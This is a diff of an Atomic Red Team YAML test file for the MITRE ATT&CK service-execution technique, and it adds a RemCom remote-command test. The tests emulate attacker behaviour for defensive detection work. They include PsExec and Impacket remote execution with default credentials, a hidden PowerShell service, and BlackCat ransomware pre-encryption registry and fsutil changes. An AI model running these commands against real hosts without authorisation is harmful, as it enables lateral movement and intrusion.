atomics/T1569.002/T1569.002.yaml (before)
attack_technique: T1569.002
display_name: 'System Services: Service Execution'
atomic_tests:
- name: Execute a Command as a Service
  auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1
  description: |
    Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.

    Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`

    [BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware)  
    [Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware)
  supported_platforms:
  - windows
  input_arguments:
    service_name:
      description: Name of service to create
      type: string
      default: ARTService
    executable_command:
      description: Command to execute as a service
      type: string
      default: '%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt'
  executor:
    command: |
      sc.exe create #{service_name} binPath= "#{executable_command}"
      sc.exe start #{service_name}
      sc.exe delete #{service_name}
    cleanup_command: |
      del C:\art-marker.txt >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Use PsExec to execute a command on a remote host
  auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c
  description: |
    Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments
    Will start a process on a remote host.

    Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost).
  supported_platforms:
  - windows
  input_arguments:
    remote_host:
      description: Remote hostname or IP address
      type: string
      default: localhost
    user_name:
      description: Username
      type: string
      default: DOMAIN\Administrator
    password:
      description: Password
      type: string
      default: P@ssw0rd1
    psexec_exe:
      description: Path to PsExec
      type: string
      default: C:\PSTools\PsExec.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
    prereq_command: |
      if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
    get_prereq_command: |
      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
      Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
      New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
      Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
  executor:
    command: |
      #{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe"
    name: command_prompt


- name: psexec.py (Impacket)
  auto_generated_guid: edbcd8c9-3639-4844-afad-455c91e95a35
  description: |
    Will execute a command on the remote host with Impacket psexec.py script.
  supported_platforms:
  - linux
  input_arguments:
    remote_host:
      description: Remote hostname or IP address
      type: string
      default: "127.0.0.1"
    username:
      description: Username
      type: string
      default: "Administrator"
    domain:
      description: Target domain
      type: string
      default: ""
    password:
      description: Password
      type: string
      default: "P@ssw0rd1"
    command:
      description: Command to execute in target computer
      type: string
      default: "whoami"
  dependency_executor_name: bash
  dependencies:
  - description: |
      psexec.py (Impacket)

    prereq_command: |
      if [ -x "$(command -v psexec.py)" ]; then exit 0; else exit 1; fi;

    get_prereq_command: |
      sudo pip3 install impacket

  executor:
    command: |
      psexec.py '#{domain}/#{username}:#{password}@#{remote_host}' '#{command}'
    name: bash
- name: BlackCat pre-encryption cmds with Lateral Movement
  auto_generated_guid: 31eb7828-97d7-4067-9c1e-c6feb85edc4b
  description: This atomic attempts to emulate the unique behavior of BlackCat ransomware prior to encryption and during Lateral Movement attempts via PsExec on Windows. Uses bundled PsExec like BlackCat
  supported_platforms:
  - windows
  input_arguments:
    targethost:
      description: Target hostname to attempt psexec connection to for emulation of lateral movement.
      type: string
      default: $ENV:COMPUTERNAME
  executor:
    command: |
      cmd.exe /c "wmic 	csproduct 	get UUID" 
      cmd.exe /c "fsutil behavior 	set SymlinkEvaluation R2L:1" 
      cmd.exe /c "fsutil behavior set 	SymlinkEvaluation R2R:1"
      reg    add    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters    /v MaxMpxCt /d 65535 /t REG_DWORD /f      
      copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
      cmd.exe /c "$env:temp\psexec.exe  -accepteula  \\#{targethost} cmd.exe  /c echo "--access-token""
    cleanup_command: |
      reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /f
      cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:0" 
      cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:0"
      rm $env:temp\psexec.exe
    name: powershell
    elevation_required: true

atomics/T1569.002/T1569.002.yaml (after)
attack_technique: T1569.002
display_name: 'System Services: Service Execution'
atomic_tests:
- name: Execute a Command as a Service
  auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1
  description: |
    Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.

    Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`

    [BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware)  
    [Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware)
  supported_platforms:
  - windows
  input_arguments:
    service_name:
      description: Name of service to create
      type: string
      default: ARTService
    executable_command:
      description: Command to execute as a service
      type: string
      default: '%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt'
  executor:
    command: |
      sc.exe create #{service_name} binPath= "#{executable_command}"
      sc.exe start #{service_name}
      sc.exe delete #{service_name}
    cleanup_command: |
      del C:\art-marker.txt >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Use PsExec to execute a command on a remote host
  auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c
  description: |
    Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments
    Will start a process on a remote host.

    Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost).
  supported_platforms:
  - windows
  input_arguments:
    remote_host:
      description: Remote hostname or IP address
      type: string
      default: localhost
    user_name:
      description: Username
      type: string
      default: DOMAIN\Administrator
    password:
      description: Password
      type: string
      default: P@ssw0rd1
    psexec_exe:
      description: Path to PsExec
      type: string
      default: C:\PSTools\PsExec.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
    prereq_command: |
      if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
    get_prereq_command: |
      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
      Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
      New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
      Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
  executor:
    command: |
      #{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe"
    name: command_prompt


- name: psexec.py (Impacket)
  auto_generated_guid: edbcd8c9-3639-4844-afad-455c91e95a35
  description: |
    Will execute a command on the remote host with Impacket psexec.py script.
  supported_platforms:
  - linux
  input_arguments:
    remote_host:
      description: Remote hostname or IP address
      type: string
      default: "127.0.0.1"
    username:
      description: Username
      type: string
      default: "Administrator"
    domain:
      description: Target domain
      type: string
      default: ""
    password:
      description: Password
      type: string
      default: "P@ssw0rd1"
    command:
      description: Command to execute in target computer
      type: string
      default: "whoami"
  dependency_executor_name: bash
  dependencies:
  - description: |
      psexec.py (Impacket)

    prereq_command: |
      if [ -x "$(command -v psexec.py)" ]; then exit 0; else exit 1; fi;

    get_prereq_command: |
      sudo pip3 install impacket

  executor:
    command: |
      psexec.py '#{domain}/#{username}:#{password}@#{remote_host}' '#{command}'
    name: bash
- name: BlackCat pre-encryption cmds with Lateral Movement
  auto_generated_guid: 31eb7828-97d7-4067-9c1e-c6feb85edc4b
  description: This atomic attempts to emulate the unique behavior of BlackCat ransomware prior to encryption and during Lateral Movement attempts via PsExec on Windows. Uses bundled PsExec like BlackCat
  supported_platforms:
  - windows
  input_arguments:
    targethost:
      description: Target hostname to attempt psexec connection to for emulation of lateral movement.
      type: string
      default: $ENV:COMPUTERNAME
  executor:
    command: |
      cmd.exe /c "wmic 	csproduct 	get UUID" 
      cmd.exe /c "fsutil behavior 	set SymlinkEvaluation R2L:1" 
      cmd.exe /c "fsutil behavior set 	SymlinkEvaluation R2R:1"
      reg    add    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters    /v MaxMpxCt /d 65535 /t REG_DWORD /f      
      copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
      cmd.exe /c "$env:temp\psexec.exe  -accepteula  \\#{targethost} cmd.exe  /c echo "--access-token""
    cleanup_command: |
      reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /f
      cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:0" 
      cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:0"
      rm $env:temp\psexec.exe
    name: powershell
    elevation_required: true
    
- name: Use RemCom to execute a command on a remote host
  auto_generated_guid: a5d8cdeb-be90-43a9-8b26-cc618deac1e0
  description: |
    Requires having RemCom installed, path to RemCom is one of the input input_arguments
    Will start a process on a remote host.
    Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
  supported_platforms:
  - windows
  input_arguments:
    remote_host:
      description: Remote hostname or IP address
      type: string
      default: localhost
    user_name:
      description: Username
      type: string
      default: Administrator
    password:
      description: Password
      type: string
      default: P@ssw0rd1
    remcom_exe:
      description: Path to RemCom
      type: string
      default: $pathtoatomicsfolder\T1569.002\bin\remcom.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      RemCom tool must exist on disk at specified location (#{remcom_exe})
    prereq_command: |
      if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
    get_prereq_command: |
      Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "#{remcom_exe}"
  executor:
    command: |
      "#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe
    name: command_prompt

atomics/T1569.002/T1569.002.yaml (diff)
@@ -140,3 +140,41 @@ atomic_tests:
       rm $env:temp\psexec.exe
     name: powershell
     elevation_required: true
+    
+- name: Use RemCom to execute a command on a remote host
+  auto_generated_guid: a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+  description: |
+    Requires having RemCom installed, path to RemCom is one of the input input_arguments
+    Will start a process on a remote host.
+    Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
+  supported_platforms:
+  - windows
+  input_arguments:
+    remote_host:
+      description: Remote hostname or IP address
+      type: string
+      default: localhost
+    user_name:
+      description: Username
+      type: string
+      default: Administrator
+    password:
+      description: Password
+      type: string
+      default: P@ssw0rd1
+    remcom_exe:
+      description: Path to RemCom
+      type: string
+      default: $pathtoatomicsfolder\T1569.002\bin\remcom.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      RemCom tool must exist on disk at specified location (#{remcom_exe})
+    prereq_command: |
+      if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "#{remcom_exe}"
+  executor:
+    command: |
+      "#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe
+    name: command_prompt
